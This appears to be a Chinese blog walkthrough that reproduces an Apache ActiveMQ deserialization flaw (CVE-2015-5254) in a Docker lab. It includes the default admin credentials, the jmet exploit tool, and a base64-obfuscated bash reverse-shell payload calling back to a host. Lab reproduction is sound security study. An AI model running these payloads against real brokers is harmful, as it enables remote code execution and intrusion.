Apache-ActiveMQ 反序列化漏洞(CVE-2015-5254)复现

CVE-2016-3088

一、环境搭建

Java:jdk8
影响版本 Apache ActiveMQ < 5.13.0

二、用docker搭建漏洞环境

访问一下web界面

然后进入admin目录登录

账号:admin

密码:admin

三、工具准备

  1. cd /opt

  2. wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar

  3. mkdir external

注意:一定要下载external,否则会报错

四、测试漏洞存在

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME 8.210.152.234(靶机IP,下图说是自己的ip是错误的) 61616

点击触发命令执行

查看一下目录,发现创建成功

五、getshell

首先借用一个网站对payload进行处理,网址我以前的文章复现有提到。

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvOTk5OSAwPiYxIA==}|{base64,-d}|{bash,-i}" 192.168.217.128 61616

最后点击它,触发命令执行

如上图所示即反弹shell成功!

相关推荐
Cachel wood3 分钟前
python round四舍五入和decimal库精确四舍五入
java·linux·前端·数据库·vue.js·python·前端框架
Code哈哈笑6 分钟前
【Java 学习】深度剖析Java多态:从向上转型到向下转型,解锁动态绑定的奥秘,让代码更优雅灵活
java·开发语言·学习
gb42152878 分钟前
springboot中Jackson库和jsonpath库的区别和联系。
java·spring boot·后端
程序猿进阶9 分钟前
深入解析 Spring WebFlux:原理与应用
java·开发语言·后端·spring·面试·架构·springboot
zfoo-framework17 分钟前
【jenkins插件】
java
虹科数字化与AR20 分钟前
安宝特应用 | 美国OSHA扩展Vuzix AR眼镜应用,强化劳动安全与效率
安全·ar·远程协助
风_流沙22 分钟前
java 对ElasticSearch数据库操作封装工具类(对你是否适用嘞)
java·数据库·elasticsearch
Hacker_Fuchen39 分钟前
天融信网络架构安全实践
网络·安全·架构
炫彩@之星41 分钟前
Windows和Linux安全配置和加固
linux·windows·安全·系统安全配置和加固